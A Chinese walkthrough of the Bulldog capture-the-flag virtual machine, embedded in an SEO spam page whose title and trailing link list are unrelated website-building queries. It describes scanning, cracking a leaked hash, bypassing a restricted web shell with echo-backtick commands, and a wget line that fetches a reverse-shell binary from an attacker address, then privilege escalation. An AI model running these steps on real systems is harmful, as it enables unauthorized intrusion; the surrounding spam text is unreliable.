当前位置: 首页 > news >正文

flashfxp怎么做网站零陵网站建设

flashfxp怎么做网站,零陵网站建设,做外贸常用的网站有哪些,扫二维码进入个人的购物网站如何做声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 开搞 首先nmap扫描目标机开放端口和服务 访问80端口 扫目录撒 发现登录口 点击web-shell提示登录后才能使用 /dev/下面查看网页源码发现村咋h…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

开搞

首先nmap扫描目标机开放端口和服务

在这里插入图片描述

访问80端口

在这里插入图片描述

扫目录撒

在这里插入图片描述

发现登录口

在这里插入图片描述
在这里插入图片描述
点击web-shell提示登录后才能使用

在这里插入图片描述

/dev/下面查看网页源码发现村咋hash值

在这里插入图片描述

awk提取hash

把那堆复制到1.txt中提取
在这里插入图片描述

在线解密

https://crackstation.net/
在这里插入图片描述

nick/bulldog登录

在这里插入图片描述

进入web-shell

可以执行命令
在这里插入图片描述
但是很多命令不让用
在这里插入图片描述
可以用echo `curl` 的方法绕过限制
在这里插入图片描述

创建反弹shell

python起个服务

在这里插入图片描述

wget下载到目标

echo `wget http://192.168.2.129:5555/5555.elf`

在这里插入图片描述

msf建立监听

在这里插入图片描述

给5555.elf添加执行权限并执行

在这里插入图片描述

拿到shell

在这里插入图片描述

进入shell

在这里插入图片描述

查看家目录有啥

在这里插入图片描述

查看hiddenadmindirectory

查看note
在这里插入图片描述

密码藏在customPermissionApp

SUPERultimatePASSWORDyouCANTget
在这里插入图片描述

结束

因为这个文件是bulldogadmin的文件,我的身份是django,所以需要sudo 去给他加执行权限,sudo chmod 777 customPermissionApp就要用到django的密码
执行后变成了root权限
靶标一般就在root目录下
在这里插入图片描述

http://www.yayakq.cn/news/801725/

相关文章:

  • 电商网站规划与建设方案桂平网站制作
  • 松滋网站定制seo关键词推广多少钱
  • 建设网站模板免费wordpress word插件
  • 做ppt时网站怎么设计珠海网站上排名
  • 网站建设合同用缴印花税吗龙岩建设局网站声明
  • 胖小七网站建设上海装饰公司10排名
  • 卖鞋的网站建设思路新网 网站建立
  • 地税局网站建设情况汇报手机网站建设合同
  • 鹤壁专业做网站多少钱软件开发合同书范本
  • 做软装设计找图有什么好的网站开发网站需要什么技术
  • 各网站的风格及特点门户网站系统有哪些平台
  • 北京房地产网站建设网站首页图片滑动怎么做
  • 网站备案格式seo咨询茂名
  • 网站建设英语翻译海口网站建设找千素网
  • 网站营销活动策划邯郸网络营销推广软件
  • 钓鱼网站查询系统在线做带字头像的网站
  • 网站建设阶段要做什么微信网站制作免费
  • 网站建设的建议和意见做网站的接私活犯法吗
  • 网站上传的视频播放卡想找人做网站
  • 北京网站建设公司排行怎么网站定制
  • php精品网站建设专业外贸网站制作公司
  • 外贸自建站费用一个域名一个主机可以做两个网站吗
  • 教务系统门户网站有没有什么东西可以做网站
  • 网站建设开发实训报告总结html网站注册页面
  • 做的网站怎么让百度收索时搜邦邻网站建设熊掌号
  • 重庆荣昌网站建设费用网站的建设论文
  • 北京做兼职的网站vivo即将发布的新手机
  • 如何制作网站专题站酷网站
  • 做网站站长先把作息和身体搞好大学生创意app点子
  • 淘宝怎么发布网站建设网站建设倒计时模板